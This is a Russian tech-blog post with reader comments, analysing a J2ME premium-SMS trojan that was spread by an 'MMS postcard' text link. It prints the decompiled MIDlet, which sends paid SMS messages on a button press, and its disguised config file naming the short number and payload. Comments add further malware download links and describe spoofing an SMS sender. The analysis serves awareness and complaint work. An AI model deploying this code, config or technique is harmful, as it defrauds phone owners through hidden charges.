Небольшое исследование sms спама

    image
    Картинка справа не совсем соответствует содержанию поста, просто небольшой пример смс-спама.

    Итак, сама история: получил вчера смс следующего содержания:

    «Вам MMS сообщение tutu.wml.in/lo.jar»

    Очевидно, что это очередной развод и я не стал открывать ссылку и занялся чем-то другим.

    Но сегодня утром мне стало интересно, что же там, как оно работает и что делает.


    Скачал с компьютера этот джарник и распаковал. Внутри было все по минимуму:

    — Небольшая картинка
    image

    — Скомпилированный java класс main.class
    — Какая-то сомнительная пнг-шка, неоткрываемая просмотрщиками картинок.
    — Класс ResourceUTF8, взятый видимо отсюда.

    Декомпилировав содержимое мэйн-класса я увидел следующий код:
    import java.io.IOException;
    import javax.microedition.io.Connector;
    import javax.microedition.lcdui.Command;
    import javax.microedition.lcdui.CommandListener;
    import javax.microedition.lcdui.Display;
    import javax.microedition.lcdui.Displayable;
    import javax.microedition.lcdui.Form;
    import javax.microedition.lcdui.Image;
    import javax.microedition.midlet.MIDlet;
    import javax.wireless.messaging.MessageConnection;
    import javax.wireless.messaging.TextMessage;
    import lib.Resources.ResourcesUTF8;

    public class main extends MIDlet implements CommandListener {

      public static ResourcesUTF8 language;
      private boolean isLanguage;
      private Form form;
      private Image image;
      private Display display;
      private Command cmd_ok;
      private Command cmd_cancel;

      public main() {
       language = new ResourcesUTF8("/sample.png");
       this.isLanguage = language.load();
       this.cmd_ok = new Command("\u041e\u043a", 4, 2);
       this.cmd_cancel = new Command("\u041e\u0442\u043c\u0435\u043d\u0430", 7, 4);
      }

      public void startApp() {
       this.display = Display.getDisplay(this);

       try {
         this.image = Image.createImage(language.get("picname"));
       } catch (IOException var2) {
         System.out.println(var2.getMessage());
       }

       this.form = new Form(language.get("title"));
       this.form.append(language.get("textvalue"));
       this.form.addCommand(this.cmd_ok);
       this.form.addCommand(this.cmd_cancel);
       this.form.setCommandListener(this);
       this.display.setCurrent(this.form);
      }

      public void pauseApp() {
       System.gc();
      }

      public void destroyApp(boolean var1) {
      }

      public void commandAction(Command var1, Displayable var2) {
       if(var1 == this.cmd_ok) {
         String var3;
         MessageConnection var4;
         TextMessage var5;
         try {
          var3 = "sms://" + language.get("numberphone1");
          var4 = (MessageConnection)Connector.open(var3);
          var5 = (TextMessage)var4.newMessage("text");
          var5.setPayloadText(language.get("message1"));
          var4.send(var5);
         } catch (Exception var8) {
          ;
         }

         try {
          var3 = "sms://" + language.get("numberphone2");
          var4 = (MessageConnection)Connector.open(var3);
          var5 = (TextMessage)var4.newMessage("text");
          var5.setPayloadText(language.get("message2"));
          var4.send(var5);
         } catch (Exception var7) {
          ;
         }

         try {
          var3 = "sms://" + language.get("numberphone3");
          var4 = (MessageConnection)Connector.open(var3);
          var5 = (TextMessage)var4.newMessage("text");
          var5.setPayloadText(language.get("message3"));
          var4.send(var5);
         } catch (Exception var6) {
          ;
         }

         this.form.delete(0);
         this.form.append(this.image);
       }

       if(var1 == this.cmd_cancel) {
         this.notifyDestroyed();
       }

      }
    }


    * This source code was highlighted with Source Code Highlighter.

    Если кому-то интересно декомпилировал онлайн-декомпилятором Fernflower.

    Чтобы понять, что делает код, можно даже не быть программистом. Он берет какую-то информацию из той странной png-шки и отправляет смс-ки с телефона.

    Вот содержимое png, если ее открыть блокнотом:
    title=OTKPblTKA
    textvalue=Просмотреть открытку?
    picname=/love.JPG
    numberphone1=7132
    message1=199414999922

    А вот и номер, куда будет отправляться смс и текст сообщения. Да, развязка весьма тривиальна. И следовало ожидать именно этого. Но все равно, считаю что не зря потратил время. И быть может кому-нибудь из хабра-сообщества эта информация покажется интересной.

    UPD: написал жалобу в службу поддержки владельца короткого номера, воспользовавшись этой инструкцией.
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 69

      +41
      Надеюсь вы после такого изучения написали жалобу опсосу и сдающей в аренду этот номер фирме?
        0
        Да вот думаю, стоит ли это делать? Винлокеры вон уже довольно давно гребут деньги через смс и никакие жалобы не помогают.
          +36
          Не знаю как с короткими номерами, а вот 10-значные по моей просьбе блокировали неоднократно.

          Звонишь, просишь соединить со службой безопасности, сообщаешь свой номер, откуда, что и во сколько прислали. Дальше они делают свою работу.
            +64
            Ок, отправлю жалобу. Все лучше чем ничего не делать.
              0
              Получил ответ.

              От: Поддержка СМСРЕНТ Служба
              Тема: Re: Жалоба от абонента — smsrent.ru

              Здравствуйте. Вчера, посмотрев ваш пост на Хабре, сразу отписали владельцу короткого номера 7132 :) Обещали заблокировать.
              +3
              номер четырехзначный
                +2
                номера никто не будет блокировать. не стоит путать короткий смс-номер и префикс, который сдаётся в аренду кому попало.
                префиксы блокируют на раз по обращению. делает это контент-провайдер, который владеет номером.
                в некоторых операторах постепенно появляется функционал, позволяющий это делать (блокировать префиксы) на уровне оператора, что позволит оградить пользователя от списания средств за блокированный префикс (в случае блокировке на уровне контент-провайдера бабло всё равно списывается, но потом возвращается).
                  +1
                  Думаю, если номер неоднократно будет уличён в мошенничестве, его заблокируют целиком.
                    +1
                    На одном номере может висеть очень много всяких услуг. Одни услуги рассылают анекдоты и картинки кошечек по запросу и чтобы получить всё это счастье надо ввести определенный номер в самом сообщении. А у винлокеров и прочих пидарасов надо вводить совершено другой код в сообщении. Номер один, а компании разные.
                      –2
                      не. это никому не нужно.
                      тем более номерами владеют контент-провайдеры (хотя и арендуют техническую возможность пользования у опсосов).
                      на одном номере может висеть огромное количество услуг. в том числе услуг сторонних партнёров контент-провайдеров. вот как раз эти партнёры и занимаются мошенничеством — их могут и заблокировать, могут ментам сдать.

                      случай кстати был. от меня как-то раз вконтакте спам был (хотя я вроде не последний лох в обеспечения собственной безопасности в сети, но видимо где-то засветил свой пароль в открытом wifi =\ ). так вот, воспользовавшись кое-какими связями я даже умудрился выбить из контент-провайдера скан паспорта владельца мошеннического префикса и его контактные данные (префикс естественно заблокировали). чел оказался вполне реальный. интересно, что когда КП прислал мне это письмо, они в нём попросили не предпринимать никаких действий, поскольку чел находится под наблюдением соответствующих органов. ну я решил не ввязываться — просто пообщался с челом. он правда так и не ответил на мой вопрос… т.е. смысл в том, что даже сами КП неохотно перекрывают кислород своим партнёрам — поскольку те приносят хорошие деньги, пока конечно на них конкретно не наедут)
                        0
                        Номер отправителя на самом деле ничего не значит. Сейчас попробовал — через один сайт отправил себе смс, и отправителем указал 4040. Пришло.
                        Надо радоваться, что школомошенники не додумались отправлять смс через подобные сайты, и в графе отправитель писать «Сын» или «Дочь».
                          +1
                          Сейчас кого нить осенит и начнётся по именной спам
                            0
                            Это баловство я еще напервом курсе универа практиковал. Прога позволяла на 1-н акк отправить 5 шаровых смс (с подменой номера). Никаких хитрых умыслов, лишь шутки над знакомыми. Но было весело =)
                        0
                        принято. поторопился с комментарием. объяснение очевидно )
                    +7
                    Если все будут писать биллингу, а не на хабры — поможет. По крайней мере данный конкретный спамер останется без выплаты.
                      0
                      Смотрите сколько попавшихся — impravo.ru/jaloba/company/инкормедиа/

                      Все пишут биллингу. Биллинг тупо игнорирует. Однозначно «крыша» сверху

                      И это только те, кто написал…
                  +18
                    0
                    Хм, оказывается я не первый. В том топике принцип развода тот же.

                    Кстати, немного погуглив, нашел вот что: grabberz.com/showthread.php?s=b209dab0e0e46a4cc1660efce05b34bb&p=309865&mode=threaded

                    Снизу приписка: «Ну и так как текст смс и номера для отправки можно легко изменить тем же блокнотом, вылаживаю сюда этот троянчик (но под хайдом):»

                    Видимо многие юные хакеры, ввиду простоты способа, решили разбогатеть за чужой счет, организовав подобные рассылки.
                      +1
                      Долго же «мама» ответ писала: входящее датировано августом прошлого года, фотография сделана сегодня, а ответное СМС отправлено буквально перед тем, как был сделан снимок ;)
                        +1
                        Это не моя картинка. Лежала на винте, содранная откуда-то из интернета, вот и пригодилась.
                      +10
                      а что нового? было в блоге java
                        0
                        Ну как что нового?! Другой декомпилятор же))
                        +4
                        Очень похоже на предыдущую. Только там информативнее было.
                          –6
                          >> И быть может кому-нибудь из хабра-сообщества эта информация покажется интересной.
                          Ага! Тысячи хомячков с хабра ломанутся сушить сухари писать свой «мега спам бот».
                          Какая еще польза. Алгоритм очевиден, анализ тривиален, рекомендаций по борьбе — нет…
                            0
                            хм, Каспер удачно не пустил меня на эту страницу)
                              0
                              Пользователь с этой картинкой: amxm
                                0
                                Наводит на определенные мысли…
                                Но главное, чтобы его не начали минусовать, как обычно это бывает))
                                  0
                                  Наводит на определенные мысли…
                                  Главное, чтобы его не начали минусовать, а то бывает))
                                    +3
                                    Они кругом!. А ещё у вас у обоих в никах встречается буквы 'a'. Наводит на определенные мысли…

                                    Короче, ребят, хорош фигнёй страдать.
                                    0
                                    И еще раз убеждаюсь в том, что мобилки для родителей должны быть на уровне нокиа 1100.
                                    Никаких ммс, никакой джавы, никаких тач приколов.
                                    Две кнопки — зеленая — принять; красная — отбой.
                                      +13
                                      можно сразу в дом престарелых сдать, чё уж там
                                        –14
                                        Это типа финская шутка такая?
                                          –1
                                          тега irony на хабре вроде как не придумали
                                            –12
                                            Экстрасенсы в отпуске.
                                              +7
                                              отсутствие лично у тебя чувства юмора — твоя личная проблема
                                                –5
                                                Шутка на самом деле не удалась.
                                                  0
                                                  Вот я не понимаю на хабре некоторых вещей. В чём я ошибся в своём утверждении?
                                                  –4
                                                  Давайте на этом и закончим.
                                                  Просто если бы сморозил бы какую-то х8н8 про Вашим родителей — реакция была бы соответствующей.
                                        +11
                                        public void pauseApp() {
                                           System.gc();
                                        }

                                        вскрыло :)
                                          +3
                                          Да, это шедевр.
                                            0
                                            ystem.gc(); — что это значит?
                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                +1
                                                Собрать мусор.
                                              –1
                                              А что в этом такого, чего вскрыло то? Распространённая практика. И в книжках и примерах то и дело встречается. Другое дело, что необходимость ручного вызова gc в общем случае под вопросом при pauseApp, но хуже точно не будет)
                                                0
                                                Хм, ну так всё же? Всё равно интересно, что именно тут странного. Ну да ладно…

                                                На самом деле зря это вы сомневаетесь, ибо по спецификации в pauseApp прямым текстом полагается «по максимуму освободить занятые ресурсы». Если вам кажется, что тут смешно потому что в Java так делать не принято, то тут тоже пальцем в небо, ибо javame почти никогда «не java». И скорее всего вы и не писали никогда под javame. Тут свои приколы и в реальных ситуациях прямое обнуление ссылок после использования и вызов gc реально полезен, читайте статьи по перфомансу. Есть куча имплементаций JVM для мобил, где странные действия приносят профит, потому в нормальных профессиональных приложениях встречаются иногда смешные куски кода.
                                              0
                                              у меня дежавю?
                                              0
                                              подобная статья уже была, ничего нового
                                                0
                                                а мне вот такая радость приходила:
                                                xseksx.ru/x/40/dl/480/otkritka.jar

                                                там все оказалось чуть посложнее, чем один main class, я из-за этих спамеров час убил, чтобы выковырять номерки и тексты ^^
                                                  0
                                                  Стоимость SMS на номер 7132 с номера Теле2 составляет 198,24 руб. Сервис оказывает InCoreMedia.
                                                    0
                                                    Номер пейстрима, paystream.ru
                                                      +15
                                                      Картинка соответствует картинке у поста справа
                                                        0
                                                        Фееричный ответ))
                                                        +1
                                                        Опасности только мало. Все равно телефон спрашивает, отправлять ли SMS. Похоже, если только это «Программа для анонимной отправки SMS». Но знающий человек все равно не нажмёт.

                                                        И не надо раздувать из этого «вирус/троян для мобильных телефонов», ведь никаких уязвимостей, кроме тех, которые в головах пользователей, он не задействует.
                                                          +2
                                                          Не перестаю напоминать, что самый большой (в $$) ущерб был нанесен вирусом I Love You, который вообще не использовал никаких уязвимостей, а честно лежал во вложении к письму и просил себя открыть.
                                                            0
                                                            Да, а ещё были Adobe Photoshop вместе с Corel Draw и Harry Potter в виде .PIF файлов (год 2003-2004, если не ошибаюсь)
                                                            0
                                                            Стоит сказать о новом виде мошенничества, не требующим отсылки СМС или подписки на какие-либо услуги, а именно — премиальный трафик. Ранее были единичные сообщения о большом счёте за интерент при посещении некоторых ресурсов (подобное на блоге F-Secure).
                                                            Сегодня вышла обзорная статья на mobile-review
                                                              0
                                                              А вот об этом я не знал. Что ж, посмотрим, будет ли это распространено…
                                                                0
                                                                у меня девушка на днях получила смску с предложением зайти на некий ресурс и посмотреть открытку. Таки-да, оказался wap-сайт с «премиальным» трафиком.
                                                                0
                                                                Ну, это далеко не ново: абоненты билайн и мтс с России уже больше года стонут от полузаконного способа отъема денег. От самих опсосов можно даже получить официальные списки сайтов с повышенной тарификацией. Странно, что на хабре об этом только одна короткая статья в закрытом блоге: habrahabr.ru/blogs/i_am_angry/102085/
                                                                Может, написать по возможности всеобъемлющую?
                                                              0
                                                              Имхо, статья была бы намного интереснее, если бы она раскрывала техническую часть именно sms-спама — махинаций вроде «мама, у меня проблемы». Самому подобные сообщения не раз приходили, почитал бы с удовольствием. А так… всё тоже самое было (уже десятый, наверное, комментарий об этом) в блоге java пару недель назад. Даже не знаю, что и добавить.
                                                                0
                                                                Да зачастую вся техническая часть подобных смс сидит в местах «не столь отдаленных», и рассылают эти письма счастья. Вот так вот.
                                                                –2
                                                                Да это зеки так разводять из зоны народ
                                                                вот про эти разводы пишут сами зеки:
                                                                http://2zeka.ru/post/506
                                                                и про то как зеки еще зарабатывают на зоне:
                                                                http://2zeka.ru/post/490
                                                                  +6
                                                                  Как зеки зарабатывают на зоне с помощью мобильного телефона и SEO лампочка лампы накаливания осветительные приборы монтаж.
                                                                  +1
                                                                  «lo.jar» — говорящее название, жалко у джарников расширение не .shara
                                                                    0
                                                                    А вот мне такое сегодня пришло:
                                                                    redmms.jino.ru/mms.jar
                                                                    В jar-ке 7 файлов с class-ами плюс некий обфускатор в коде, так что короткого номера и текста смс не видно, а заабузить хочется. Прогнал через декомилятор, получил семь java-файлов, как теперь их в Java(TM) ME Platform SDK 3.0 открыть для отладки?

                                                                    Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                    Самое читаемое